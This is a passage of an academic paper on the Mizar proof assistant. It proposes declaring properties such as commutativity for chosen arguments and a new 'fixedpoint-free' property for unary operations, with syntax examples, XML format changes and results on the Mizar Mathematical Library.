the notation of the notion. For example, if x and y are elements of How to cite this article Korniłowicz A. 2020. Enhancement of properties in Mizar. PeerJ Comput. Sci. 6:e320 http://doi.org/10.7717/peerj-cs.320 https://peerj.com/computer-science mailto:arturk@math.uwb.edu.pl https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/10.7717/peerj-cs.320 http://creativecommons.org/licenses/by/4.0/ http://creativecommons.org/licenses/by/4.0/ http://doi.org/10.7717/peerj-cs.320 a group G, then for the operation x+y, where + denotes the addition of elements of the group G, x and y are visible arguments, while G is a hidden argument of the operation. In this paper we propose an extension of both the Mizar language and the Mizar proof- checker which allows declaring properties of notions of arbitrary arity with respect to explicitly indicated arguments. We also introduce a new property—the ‘‘fixedpoint-free’’ property of unary operations. It states that the result of applying the operation to its argument always differs from the argument. The structure of the paper is the following: in ‘Mizar proof-assistant’ we present the Mizar proof-assistant with the focus on its features related to the new development proposed in this paper; in ‘Properties’ we describe how to define and use properties for arbitrary arguments; in ‘Fixedpoint-free Property’ we present the ‘‘fixedpoint-free’’ property; and finally, in ‘Conclusions and Future Work’, we describe some conclusions and plans for next enhancements of properties in Mizar. The results of implementing new features in the Mizar Mathematical Library (MML) (Bancerek et al., 2018; Alama et al., 2011) are shown in both ‘Properties’ and ‘Fixedpoint-free Property’. MIZAR PROOF-ASSISTANT The Mizar project started in 1973 under the leadership of Andrzej Trybulec (Matuszewski & Rudnicki, 2005; Grabowski, Korniłowicz & Naumowicz, 2015). The main goal of the project is to develop a computer framework that allows writing mathematical papers under the control of computer programs that check syntactical, semantical and logical correctness of texts. The Mizar project consists of three main components: • a language invented to write mathematical texts to be processed by computers, • a collection of computer programs designed and implemented for processing texts written in the Mizar language, with its core program, a proof-checker named Verifier, suitable for formal verification (Avigad & Harrison, 2014; Trybulec et al., 2013; Wiedijk , 2006), and • the Mizar Mathematical Library—a library of documents (called articles) written in the Mizar language and verified by the Mizar proof-checker. Language The Mizar language reflects the natural language of mathematics and enables computers to efficiently process documents written in the language. It implements rules for writing: formulae of various kinds, definitions, theorems, local lemmas, reasoning methods, proof steps, and other syntactic constructions instructing the proof-checker to launch dedicated algorithms for processing particular mechanisms (e.g., term identifications (Grabowski, Korniłowicz & Naumowicz, 2010), term reductions (Korniłowicz, 2013), properties of predicates and functors (Naumowicz & Byliński, 2004)), etc. For the purposes of this paper we recall some basic information about how new mathematical notions can be defined in Mizar articles. The Mizar language allows users to define predicates, functors (linguistic functions used to define operations), attributes (Naumowicz, 2009), types (Bancerek, 2003), and Korniłowicz (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.320 2/16 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.320 structures. The general form of a definition consists of the definition arguments, permissive assumptions (necessary to prove the correctness of the definition), its notation (prefix, infix or suffix), the result type, the definiens, correctness conditions, and some extra properties. For example, the union of two sets can be defined as follows: definition let X,Y be set; func X \/ Y -> set means :: XBOOLE_0:def 3 for x being object holds x in it iff x in X or x in Y; existence; uniqueness; commutativity; idempotence; end; where the statement let X,Y be set; introduces two arguments, func declares that it is a definition of an operation, X \/ Y introduces the symbol \/ for the union and declares it to be used as an infix symbol, → set defines the type of the result of the operation (the union of two sets is a set), XBOOLE_0:def 3 is a unique identifier of the definition (it can be used to refer to the definition), for statement describes the meaning of the definition (it keyword in the definiens represents the notion being defined), existence is an automatically generated statement that has to be proved by authors to justify that there exists an object satisfying the definiens, uniqueness is another automatically generated statement that has to be proved to justify that there exists only one object satisfying the definiens, commutativity and idempotence are extra properties that can be declared and proved about the notion at this stage. One can observe that in the above example definition there are no permissive assumptions, because they are not necessary to justify the existence and uniqueness. But, for example, in the definition of a homeomorphism between two topological structures: definition let S,T be TopStruct; assume S,T are_homeomorphic; mode Homeomorphism of S,T -> Function of S,T means :: TOPGRP_1:def 3 it is being_homeomorphism; existence; end; such an assumption assume S,T are_homeomorphic; is necessary to justify the existence, because in general not all topological spaces are homeomorphic. The Mizar language allows also introducing, so called, redefinitions. Redefinitions can be used for the following purposes: • to change result types of operations for more specific types of arguments; for example, addition of numbers can be defined for complex numbers with the result type Korniłowicz (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.320 3/16 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.320 representing complex numbers, but when arguments of the definition are, say, natural numbers, the result type of the addition can be redefined to the type representing natural numbers; • to reformulate definiens formulae in domain languages adequate to the types of arguments of the notion; for example, the inclusion of arbitrary sets can be defined in terms of elements of the sets, while when arguments of the inclusion are binary relations, the definiens of the inclusion can be formulated in terms of pairs of elements. Proof checker The logical foundation of the Mizar checker is classical first-order logic with equality (in some contexts, however, free second-order variables are permitted enabling the introduction of schemes, e.g., the scheme of mathematical induction). The proof system is based on the Jaśkowski style of natural deduction (Jaśkowski, 1934). Structures of proofs are basically related to the structures of the formulae being proved with application of definitional expansions. From the author’s perspective, the correctness of formalized reasoning is controlled by the core utility of the Mizar system, the Verifier. Although its proof-checking code is sufficient to guarantee logical correctness, there are successful applications of external software to perform some particular tasks during processing Mizar texts (Naumowicz, 2015; Naumowicz, 2014; Naumowicz, 2010). Verifier is a classical proof checker based on the notion of the inference obviousness (Davis, 1981; Rudnicki, 1987). The basic modules of Verifier are the following: Parser which is responsible for controlling the lexical structure of a given text and generating the parse tree of the text. MSM Processor which identifies constants, variables and labels. Analyzer which identifies objects and operations, performs type checking and resolves possible ambiguities caused by overloading of symbols. Moreover, it verifies if constraints required by particular constructions are fulfilled. Reasoner which controls structures of proofs according to the natural deduction rules. Checker which verifies logical correctness of inferences. As a disprover it tries to refute negations of processed sentences. It performs propositional calculus (Prechecker), equational calculus over equalities accessible in inferences (Equalizer) and unification (Unifier). Mizar Mathematical Library The Mizar Mathematical Library (MML) (Bancerek et al., 2018; Alama et al., 2011) was established in 1989 to accumulate mathematical knowledge formalized and verified using the Mizar proof-assistant. It is a collection of papers based on the Tarski-Grothendieck (TG) set theory, which is a variant of the ZFC set theory (Hayden et al., 1968), where the axiom of infinity is replaced by Tarski’s axiom of existence of arbitrarily large, strongly inaccessible cardinals (Tarski, 1939). Korniłowicz (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.320 4/16 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.320 The current Version 5.63.1382 of the Mizar Mathematical Library contains 1385 articles (107,756,687 bytes in total) devoted to various branches of mathematics. Developing the MML includes the following tasks: • collecting new knowledge realized by: (a) developing background knowledge to prepare a comprehensive database for practicing mathematicians and for educational purposes; (b) formalizing entire mathematical books (Gierz et al., 1980; Bancerek & Rudnicki, 2002); (c) formalizing well-known theorems (Abad & Abad, 1999); and (d) developing new theories (Grabowski, 2014; Grabowski, 2013; Grabowski & Jastrzebska, 2010). • refactoring the database (Grabowski & Schwarzweller, 2007) to keep its integrity (Rud- nicki & Trybulec, 2003) and to increase readability of the stored proofs (Pąk, 2014). Knowledge stored in the database is used in various branches of science and education, e.g., for representing mathematics on WWW (Iancu et al., 2013; Urban, 2005), as an input for ATP systems (Urban, Rudnicki & Sutcliffe, 2013; Urban & Sutcliffe, 2010; Urban, Hoder & Voronkov, 2010; Urban, 2008), as an input for services classifying mathematics (Grabowski & Schwarzweller, 2012), and others. Processing Mizar articles Every Mizar article written as a plain text file with the file extension .miz consists of two main parts: its environment, which can be seen as the import part from the Mizar Mathematical Library, and text-proper part, where new definitions, lemmas, theorems etc. are placed. In the environment part the following directives are allowed: • vocabularies –imports symbols of notions stored in the MML. • notations –imports notations of notions stored in the MML. The order is important –in the case of overloading the last one counts. • constructors –imports constructors (meanings) of notions. • theorems –imports theorems to which proofs refer to. • schemes –imports schemes to which proofs refer to. • definitions –imports formulae that determine proof skeletons. • registrations –imports registrations, term identifications and term reductions used in proofs. • equalities –imports equalities of operations defined using equals clause with their meanings. • expansions –imports expansions of predicates and adjectives. • requirements –imports switches to launch build-in procedures by the checker. The environment is processed by a dedicated program—Accommodator. It reads the environment part of the article and prepares global notions ready to be used in the local article. When it is done, Verifier processes the text-proper part of the article. Firstly, Parser scans the article, checks its grammatical correctness and prepares the parse tree of the article. The parse tree is stored in the XML file with the extension .wsx (Naumowicz & Piliszek, 2016). The next submodule, MSM Processor, reads the .wsx file and identifies Korniłowicz (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.320 5/16 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.320 all identifiers of constants, variables and labels that appear in the article. MSM Processor adds computed information to data written in the .wsx file and creates another XML file with the extension .msx. Then, Analyzer reads the .msx file and resolves ambiguities and identifies used notions (predicates, adjectives, types, operations and structures). Analyzer creates another XML file with the extension .xml—the structure of this .xml file differs from structures of both .wsx and .msx files. The .xml file contains the complete semantic information about all constructions used in the processed article. When all ambiguities are resolved and all notions are identified, the article is ready to be verified against its logical correctness by the Mizar checker. Formulae are negated, transformed to their disjunctive normal forms and all disjuncts, one by one, are then verified by Equalizer—a Mizar module dealing with equational calculus (Rudnicki & Trybulec, 2001). It collects all terms from the processed disjunct, and computes the congruence closure over equalities available in the inference. The equalities can be provided by various Mizar constructions, like: term expansions (equals), properties of operations, term reductions, term identifications, arithmetic, type changing (reconsider), and others, e.g., processing structures. For the sake of this paper let us underline properties of operations. They are described in more detail in ‘Properties’. The last procedure applied to the processed inference is its unification. If Equalizer cannot disprove the formula, Unifier starts working and tries to refute it. If Unifier finds a contradiction, the original disjunct is accepted as true; otherwise, appropriate messages are reported and authors are supposed to complete missing proofs. When all formulae are accepted, the article can be submitted to the Mizar Mathematical Library and the new knowledge can be used in subsequent works. Two other tools are used to export the new article into the database: Exporter—extracts public knowledge from the article, and Transferer—transfers the knowledge into the Mizar Mathematical Library. PROPERTIES Properties in Mizar are constructions which can be used to declare that predicates are reflexive (∀x :xRx), irreflexive (∀x :¬xRx), symmetric (∀x,y :xRy →yRx), asymmetric (∀x,y :xRy →¬yRx), and connected (∀x,y :xRy∨yRx); in the case of operations, they can be declared as involutive (f (f (x))=x), projective (f (f (x))= f (x)), idempotent (f (x,x)=x), and commutative (f (x,y)= f (y,x)). Such declarations of chosen properties must be placed within definitional blocks. When a notion is equipped with some properties, then adequate formulae involving the notion become obvious to the Mizar checker without any explicit reference to the definition and any theorem (they are processed automatically based on internally generated equalities of terms in cases of properties of functors and appropriate formulae in cases of properties of predicates). For example, the declaration of the idempotence of the binary union of sets implies that the equality A∪A=A becomes obvious for any set A. The current implementation of the Mizar checker is restricted to fixed numbers of visible arguments of considered notions listed in Table 1. In this work we propose an extension of the Mizar system with the possibility of explicit indication with respect to which visible arguments of mathematical notions given properties Korniłowicz (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.320 6/16 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.320 Table 1 Arities of properties of notions. Predicates Functors Property name Arity Property name Arity Reflexivity 2 Projectivity 1 Irreflexivity 2 Involutiveness 1 Symmetry 2 Commutativity 2 Asymmetry 2 Idempotence 2 Connectedness 2 can be declared. To achieve this, one can use the wrt clause followed by a comma separated list_of_loci of visible arguments of lengths presented in Table 1. The extended syntax of a definition of a functor is the following: definition let x1 be θ1, x2 be θ2, ..., xn be θn; func ⊗(x1,x2,...,xn) -> θ means :ident: 8(x1,x2,...,xn,it); correctness; property_name wrt list_of_loci justification; end; and the extended syntax of a definition of a predicate is the following: definition let x1 be θ1, x2 be θ2, ..., xn be θn; pred π(x1,x2,...,xn) means :ident: 8(x1,x2,...,xn); property_name wrt list_of_loci justification; end; For the back compatibility the wrt clause is not obligatory, definitions with no wrt clause work as in previous releases of the Mizar checker. Examples As an example of using this new feature in the MML we can cite the theorem (Kusak & Radziszewski, 1991): theorem Th78: sum(a,b,o) = sum(b,a,o); which can be reformulated as commutativity of: definition let SAS be Semi_Affine_Space; let a,b,o be Element of SAS; func sum(a,b,o) -> Element of SAS means :Def5: congr o,a,b,it; correctness by Th62,Th63; commutativity wrt a,b by Th69; Korniłowicz (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.320 7/16 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.320 end; An interesting example of a theorem which at the first glance looks like symmetry of some quaternary predicate with respect to the third and forth argument, but cannot be reformulated as symmetry of the predicate, is Oryszczyszyn & Prazmowski (1990): theorem Th24: p,q _|_ p1,q1 implies p,q _|_ q1,p1; To explain this fact one should look at types of variables p, q, p1, and q1 used in the theorem and types of arguments of the definition of the predicate _|_. The type of p, q, p1, and q1 is reserve V for RealLinearSpace; reserve w,y for VECTOR of V; reserve p,p1,q,q1 for Element of AMSpace(V,w,y); while the predicate _|_ is defined as: definition let POS be OrtStr; let a,b,c,d be Element of POS; pred a,b _|_ c,d means :: ANALMETR:def 5 [[a,b],[c,d]] in the orthogonality of POS; end; Now it is clear that types of variables p, q, p1, and q1 are more restricted than original types of arguments a, b, c, and d of the predicate declared in its definition. The statement proved as the mentioned theorem Th24 is true for elements of a particular space AMSpace(V,w,y), but does not hold for elements of an arbitrary space OrtStr. It is a very typical case, when some notion is defined for general types of arguments, and its particular properties are provable for less general ones. Changes in XML files As it was said in ‘Processing Mizar articles’, the Mizar verifier, to check the correctness of Mizar articles, generates and processes several intermediate files written in XML formats. To be able to implement the feature considered in this section, we had to slightly change the grammars of these XML files. From the perspective of Mizar users formalizing some knowledge, these changes are not important—the authors are not supposed to look into these files. For researchers who use the Mizar system for other purposes and develop external applications working on the semantic level of the Mizar Mathematical Library (Urban, 2005), these changes will induce the need for some adjustments or reimplementations. Therefore, below we explain the changes. Let us take the following definition: definition let E be set; let A,B be Element of E; Korniłowicz (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.320 8/16 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.320 func +(A,B,E) -> Element of E equals A \/ B; coherence; commutativity wrt A,B; end; as a working example. In the file .wsx (Naumowicz & Piliszek, 2016) we added a new XML element PropertyLoci including a list of loci for which the property holds. For our example it looks like this: <Item kind="Property" property="commutativity" line="15" col="15" posline="15" poscol="23"> <PropertyLoci> <Locus idnr="5" spelling="A" line="15" col="21"/> <Locus idnr="6" spelling="B" line="15" col="23"/> </PropertyLoci> <Straightforward-Justification line="15" col="23"/> </Item> This is propagated to the .msx file, which is an extension of the .wsx file, and for our example it becomes: <Item kind="Property" property="commutativity" line="15" col="15" posline="15" poscol="23"> <PropertyLoci> <Locus idnr="5" spelling="A" line="15" col="21" origin="Constant" kind="Constant" serialnr="2" varnr="2"/> <Locus idnr="6" spelling="B" line="15" col="23" origin="Constant" kind="Constant" serialnr="3" varnr="3"/> </PropertyLoci> <Straightforward-Justification line="15" col="23"/> </Item> Next two changes are introduced in .xml files: we added internal descriptions of properties in their definitions: <JustifiedProperty> <Commutativity> <PropertyLoci> <Int x="2"/> <Int x="3"/> </PropertyLoci> </Commutativity> and in constructors with which properties are associated: <Constructor kind="K" nr="1" aid="EE" relnr="20"> Korniłowicz (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.320 9/16 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.320 <Properties> <Commutativity propertyarg1="2" propertyarg2="3"/> </Properties> FIXEDPOINT-FREE PROPERTY As another enhancement of properties in Mizar we propose a new unary property of functors—‘‘fixedpoint-free’’. The fixedpoint-free property is meaningful for operations of which the result of application to a given argument is always different from the argument. This is reflected in justification formulae of the properties to be proved at the stage of defining the operation. We propose the following syntax and formulae to be proved to justify the correctness of the property for given functors. In the case of functors defined using the means clause with a simple definiens it is: definition let x1 be θ1, x2 be θ2, ..., xn be θn; func ⊗(xn) -> θn+1 means :ident: 8(x1,x2,...,xn,it); existence; uniqueness; fixedpoint-free proof thus for r being θn+1, x being θn st 8(x1,x2,...,xn−1,x,r) holds r <> x; end; end; using the means clause with a complex definiens it is: definition let x1 be θ1, x2 be θ2, ..., xn be θn; func ⊗(xn) -> θn+1 means :ident: 81(x1,x2,...,xn,it) if 01(x1,x2,...,xn), 82(x1,x2,...,xn,it) if 02(x1,x2,...,xn), 83(x1,x2,...,xn,it) if 03(x1,x2,...,xn) otherwise 8n(x1,x2,...,xn,it); existence; uniqueness; consistency; fixedpoint-free proof thus for r being θn+1, x being θn st (01(x1,x2,...,xn) implies 81(x1,x2,...,xn−1,x,r)) & (02(x1,x2,...,xn) implies 82(x1,x2,...,xn−1,x,r)) & (03(x1,x2,...,xn) implies 83(x1,x2,...,xn−1,x,r)) & (not 01(x1,x2,...,xn) & not 02(x1,x2,...,xn) & Korniłowicz (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.320 10/16 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.320 not 03(x1,x2,...,xn) implies 8n(x1,x2,...,xn−1,x,r)) holds r <> x; end; end; and similarly in the case of functors defined using the equals clause with a simple definiens it is: definition let x1 be θ1, x2 be θ2, ..., xn be θn; func ⊗(xn) -> θn+1 equals :ident: τ(x1,x2,...,xn); coherence; fixedpoint-free proof thus for r being θn+1, x being θn st r = τ(x1,x2,...,xn−1,x) holds r <> x; end; end; and using the equals clause with a complex definiens it is: definition let x1 be θ1, x2 be θ2, ..., xn be θn; func ⊗(xn) -> θn+1 equals :ident: τ1(x1,x2,...,xn) if 01(x1,x2,...,xn), τ2(x1,x2,...,xn) if 02(x1,x2,...,xn), τ3(x1,x2,...,xn) if 03(x1,x2,...,xn) otherwise τn(x1,x2,...,xn); coherence; consistency; fixedpoint-free proof thus for r being θn+1, x being θn st (01(x1,x2,...,xn) implies r = τ1(x1,x2,...,xn−1,x,r)) & (02(x1,x2,...,xn) implies r = τ2(x1,x2,...,xn−1,x,r)) & (03(x1,x2,...,xn) implies r = τ3(x1,x2,...,xn−1,x,r)) & (not 01(x1,x2,...,xn) & not 02(x1,x2,...,xn) & not 03(x1,x2,...,xn) implies r = τn(x1,x2,...,xn−1,x,r)) holds r <> x; end; end; This property can also be declared with the wrt clause as described in ‘Properties’, and could be added to Table 1. An important part of our work was implementing a tool (fixedpointfreedetector) which detects MML theorems that could be rewritten as fixedpoint-free properties of operations used in formulations of the theorems. To detect such theorems, the following steps should be done: Korniłowicz (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.320 11/16 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.320 1. If the theorem is a conjunction of some atomic formulae, decomposing a given formula to a list of atomic formulae. 2. Selecting inequalities among the atomic formulae. 3. Selecting formulae which compare unary terms with single variables among the inequalities. 4. For each such a formula checking whether: (a) the argument of the unary term equals to a single variable, (b) the type of the variable and the type of the argument of the term declared in the definition of the operation are equal. 5. If both answers to the above questions (4a) and (4b) are positive, marking the fact to be replaceable by the fixedpoint-free property of the operation. At the end of this section we present results of launching the detector on the Mizar Mathematical Library. In the current version of the library 3 such theorems were found in 3 articles. They are: the power set of a set, the successor of a set, and poles at infinity of elements of the absolute. Changing the theorems to the properties caused that 10 inferences in the Mizar Mathematical Library became obvious. Even though these numbers obtained in tests are not too big, the Library Committee of the Mizar project will analyze the cases and will decide about incorporating them into the library. In the case of approval, a refactoring (Grabowski & Schwarzweller, 2007) of the MML will be processed. Computations were carried out at the Computer Center of University of Białystok http://uco.uwb.edu.pl. CONCLUSIONS AND FUTURE WORK Although the basic concept of properties had been introduced to quite early releases of the Mizar system, we still see possibilities to design and develop new features of properties in Mizar. In this paper we described two new features: (a) we presented the syntax and semantics of a new property (fixedpoint-free) which enriches the Mizar language and increases the computational power of the Mizar checker by a more automatic processing of unary operations with no fixed points, and (b) we removed a restriction on the application of already defined properties for fixed positions of visible arguments. Investigating a more general approach to introducing properties resulted in an extension of the Mizar language and a corresponding enhancement of the Mizar proof-checker. To analyze the potential usefulness of the proposed general approach we implemented a dedicated software tool and conducted appropriate tests with it on the current Mizar Mathematical Library. As future work, we plan to open the system of properties for arbitrary (when possible) arities of predicates and functors. We already see within the current content of the Mizar Mathematical Library several applications of that approach, e.g., we would be able to define commutativity for enumerated sets with cardinality greater than two, reflexivity and symmetry of the relation of lying more than two points on a given line, and others. We Korniłowicz (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.320 12/16 https://peerj.com http://uco.uwb.edu.pl http://dx.doi.org/10.7717/peerj-cs.320 also plan to investigate new sorts of properties, like associativity or being one-to-one of functors. ADDITIONAL INFORMATION AND DECLARATIONS Funding The authors received no funding for this work. Competing Interests The authors declare there are no competing interests. Author Contributions • Artur Korniłowicz conceived and designed the experiments, performed the experiments, analyzed the data, performed the computation work, prepared figures and/or tables, authored or reviewed drafts of the paper, and approved the final draft. Data Availability The following information was supplied regarding data availability: Binary files of the programs and Mizar library required for testing are available at: Artur Korniłowicz. (2020, November 7). Fixedpoint-free property processor. Zenodo. http://doi.org/10.5281/zenodo.4255536. REFERENCES Abad P, Abad J. 1999. The hundred greatest theorems. Available at https://www.cs.ru.nl/ F.Wiedijk/mizar/mizman.pdf . Alama J, Kohlhase M, Mamane L, Naumowicz A, Rudnicki P, Urban J. 2011. Licensing the Mizar Mathematical Library. In: Davenport JH, Farmer WM, Urban J, Rabe F, eds. Proceedings of the 18th Calculemus and 10th international conference on intelligent computer mathematics. Volume 6824 of MKM’11, Lecture Notes in Computer Science. Berlin: Springer-Verlag, 149–163 DOI 10.1007/978-3-642-22673-1_11. Avigad J, Harrison J. 2014. Formally verified mathematics. Communications of the ACM 57(4):66–75 DOI 10.1145/2591012. Bancerek G. 2003. On the structure of Mizar types. In: Geuvers H, Kamareddine F, eds. Electronic Notes in Theoretical Computer Science. Vol. 85. Netherlands: Elsevier, 69–85. Bancerek G, Byliński C, Grabowski A, Korniłowicz A, Matuszewski R, Naumow- icz A, Pąk K. 2018. The role of the Mizar Mathematical Library for interac- tive proof development in Mizar. Journal of Automated Reasoning 61(1):9–32 DOI 10.1007/s10817-017-9440-6. Bancerek G, Byliński C, Grabowski A, Korniłowicz A, Matuszewski R, Naumowicz A, Pąk K, Urban J. 2015. Mizar: state-of-the-art and Beyond. In: Kerber M, Carette J, Kaliszyk C, Rabe F, Sorge V, eds. Intelligent computer mathematics –international conference, CICM 2015, Washington, DC, USA, July (2015) 13–17, proceedings. Korniłowicz (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.320 13/16 https://peerj.com http://doi.org/10.5281/zenodo.4255536 https://www.cs.ru.nl/F.Wiedijk/mizar/mizman.pdf https://www.cs.ru.nl/F.Wiedijk/mizar/mizman.pdf http://dx.doi.org/10.1007/978-3-642-22673-1_11 http://dx.doi.org/10.1145/2591012 http://dx.doi.org/10.1007/s10817-017-9440-6 http://dx.doi.org/10.7717/peerj-cs.320 Volume 9150 of Lecture Notes in Computer Science. Berlin: Springer, 261–279 DOI 10.1007/978-3-319-20615-8_17. Bancerek G, Rudnicki P. 2002. A compendium of continuous lattices in Mizar: for- malizing recent mathematics. Journal of Automated Reasoning 29(3–4):189–224 DOI 10.1023/A:1021966832558. Coq. 2020. Coq. Available at https://coq.inria.fr/ . Davis M. 1981. Obvious logical inferences. In: Proceedings of the seventh international joint conference on artificial intelligence. 530–531. Gierz G, Hofmann K, Keimel K, Lawson J, Mislove M, Scott D. 1980. A compendium of continuous lattices. Berlin: Springer-Verlag. Grabowski A. 2013. Automated discovery of properties of rough sets. Fundamenta Informaticae 128(1–2):65–79 DOI 10.3233/FI-2013-933. Grabowski A. 2014. Efficient rough set theory merging. Fundamenta Informaticae 135(4):371–385 DOI 10.3233/FI-2014-1129. Grabowski A, Jastrzębska M. 2010. A note on a formal approach to rough operators. In: Szczuka MS, Kryszkiewicz M, Ramanna S, Jensen R, Hu Q, eds. Rough sets and current trends in computing –7th international conference, RSCTC 2010, Warsaw, Poland, June (2010) 28-30. Proceedings. Volume 6086 of Lecture Notes in Computer Science. Berlin: Springer, 307–316 DOI 10.1007/978-3-642-13529-3_33. Grabowski A, Korniłowicz A, Naumowicz A. 2010. Mizar in a nutshell. Jour- nal of Formalized Reasoning, Special Issue: User Tutorials I 3(2):153–245 DOI 10.6092/issn.1972-5787/1980. Grabowski A, Korniłowicz A, Naumowicz A. 2015. Four decades of Mizar. Journal of Automated Reasoning 55(3):191–198 DOI 10.1007/s10817-015-9345-1. Grabowski A, Schwarzweller C. 2007. Revisions as an essential tool to maintain math- ematical repositories. In: Proceedings of the 14th symposium on towards mechanized mathematical assistants: 6th international conference, Calculemus ‘07 / MKM ’07. Berlin: Springer-Verlag, 235–249 DOI 10.1007/978-3-540-73086-6_20. Grabowski A, Schwarzweller C. 2012. Towards automatically categorizing mathematical knowledge. In: Ganzha M, Maciaszek LA, Paprzycki M, eds. Proceedings of the federated conference on computer science and information systems –FedCSIS 2012, Wroclaw, Poland, 9–12 2012. 63–68. Hayden S, Fraenkel AA, Zermelo E, Kennison JF. 1968. Zermelo-Fraenkel set theory by Seymour Hayden and John F. Kennison. C. E. Merrill Columbus, Ohio. HOL Light. 2020. HOL Light. Available at https://www.cl.cam.ac.uk/~jrh13/hol-light/ . Iancu M, Kohlhase M, Rabe F, Urban J. 2013. The Mizar Mathematical Library in OM- Doc: translation and applications. Journal of Automated Reasoning 50(2):191–202 DOI 10.1007/s10817-012-9271-4. Isabelle. 2020. Isabelle. Available at https://isabelle.in.tum.de/ . Jaśkowski S. 1934. On the rules of suppositions in formal logic. Studia Logica. Nakładem Seminarjum Filozoficznego Wydziału Matematyczno-Przyrodniczego Uniwersytetu Warszawskiego. Available at https://www.logik.ch/daten/jaskowski.pdf . Korniłowicz (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.320 14/16 https://peerj.com http://dx.doi.org/10.1007/978-3-319-20615-8_17 http://dx.doi.org/10.1023/A:1021966832558 https://coq.inria.fr/ http://dx.doi.org/10.3233/FI-2013-933 http://dx.doi.org/10.3233/FI-2014-1129 http://dx.doi.org/10.1007/978-3-642-13529-3_33 http://dx.doi.org/10.6092/issn.1972-5787/1980 http://dx.doi.org/10.1007/s10817-015-9345-1 http://dx.doi.org/10.1007/978-3-540-73086-6_20 https://www.cl.cam.ac.uk/~jrh13/hol-light/ http://dx.doi.org/10.1007/s10817-012-9271-4 https://isabelle.in.tum.de/ https://www.logik.ch/daten/jaskowski.pdf http://dx.doi.org/10.7717/peerj-cs.320 Korniłowicz A. 2013. On rewriting rules in Mizar. Journal of Automated Reasoning 50(2):203–210 DOI 10.1007/s10817-012-9261-6. Kusak E, Radziszewski K. 1991. Semi_Affine space. Formalized Mathematics 2(3):349–356. Lean. 2020. Lean. Available at https://leanprover.github.io/ . Matuszewski R, Rudnicki P. 2005. Mizar: the first 30 years. Mechanized Mathematics and Its Applications, Special Issue on 30 Years of Mizar 4(1):3–24. Metamath. 2020. Metamath. Available at http://us.metamath.org/mpegif/mmset.html. Mizar. 2020. Mizar. Available at http://mizar.uwb.edu.pl/ . Naumowicz A. 2009. Enhanced processing of adjectives in Mizar. In: Grabowski A, Naumowicz A, eds. Computer reconstruction of the body of mathematics, Volume 18(31) of Studies in Logic, Grammar and Rhetoric. Bialystok: University of Białystok, 89–101. Naumowicz A. 2010. Interfacing external CA systems for Gröbner bases computation in Mizar proof checking. International Journal of Computer Mathematics 87(1):1–11 DOI 10.1080/00207160701864459. Naumowicz A. 2014. SAT-enhanced Mizar proof checking. In: Watt SM, Davenport JH, Sexton AP, Sojka P, eds. Intelligent computer mathematics –international conference, CICM 2014, Coimbra, Portugal, July (2014) 7–11. Proceedings, Vol- ume 9150 of Lecture Notes in Computer Science. Berlin: Springer, 261–279 DOI 10.1007/978-3-319-08434-3_37. Naumowicz A. 2015. Automating boolean set operations in Mizar proof checking with the aid of an external SAT solver. Journal of Automated Reasoning 55(3):285–294 DOI 10.1007/s10817-015-9332-6. Naumowicz A, Byliński C. 2004. Improving Mizar texts with properties and re- quirements. In: Asperti A, Bancerek G, Trybulec A, eds. Mathematical knowledge management, third international conference, MKM 2004 Proceedings. Volume 3119 of MKM’04, Lecture Notes in Computer Science. Berlin: Springer, 290–301 DOI 10.1007/978-3-540-27818-4_21. Naumowicz A, Piliszek R. 2016. Accessing the Mizar library with a weakly strict Mizar parser. In: Kohlhase M, Johansson M, Miller BR, De Moura L, Tompa FW, eds. Intelligent computer mathematics –9th international conference, CICM 2016, Bialystok, Poland, July (2016) 25–29, Proceedings. Volume 9791 of Lecture Notes in Computer Science. Berlin: Springer, 77–82 DOI 10.1007/978-3-319-42547-4_6. Oryszczyszyn H, Prazmowski K. 1990. Analytical metric affine spaces and planes. Formalized Mathematics 1(5):891–899. Pąk K. 2014. Improving legibility of natural deduction proofs is not trivial. Logical Methods in Computer Science 10(3):1–30 DOI 10.2168/LMCS-10(3:23)2014. Rudnicki P. 1987. Obvious inferences. Journal of Automated Reasoning 3(4):383–393 DOI 10.1007/BF00247436. Rudnicki P, Trybulec A. 2001. Mathematical knowledge management in Mizar. In: Proc. of MKM 2001. Korniłowicz (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.320 15/16 https://peerj.com http://dx.doi.org/10.1007/s10817-012-9261-6 https://leanprover.github.io/ http://us.metamath.org/mpegif/mmset.html http://mizar.uwb.edu.pl/ http://dx.doi.org/10.1080/00207160701864459 http://dx.doi.org/10.1007/978-3-319-08434-3_37 http://dx.doi.org/10.1007/s10817-015-9332-6 http://dx.doi.org/10.1007/978-3-540-27818-4_21 http://dx.doi.org/10.1007/978-3-319-42547-4_6 http://dx.doi.org/10.2168/LMCS-10(3:23)2014 http://dx.doi.org/10.1007/BF00247436 http://dx.doi.org/10.7717/peerj-cs.320 Rudnicki P, Trybulec A. 2003. On the integrity of a repository of formal mathematics. In: Asperti A, Buchberger B, Davenport JH, eds. Proceedings of MKM-2003. Volume 2594 of Lecture Notes in Computer Science. Berlin: Springer-Verlag, 162–174. Tarski A. 1939. On well-ordered subsets of any set. Fundamenta Mathematicae 32:176–183 DOI 10.4064/fm-32-1-176-783. Trybulec A, Korniłowicz A, Naumowicz A, Kuperberg K. 2013. Formal 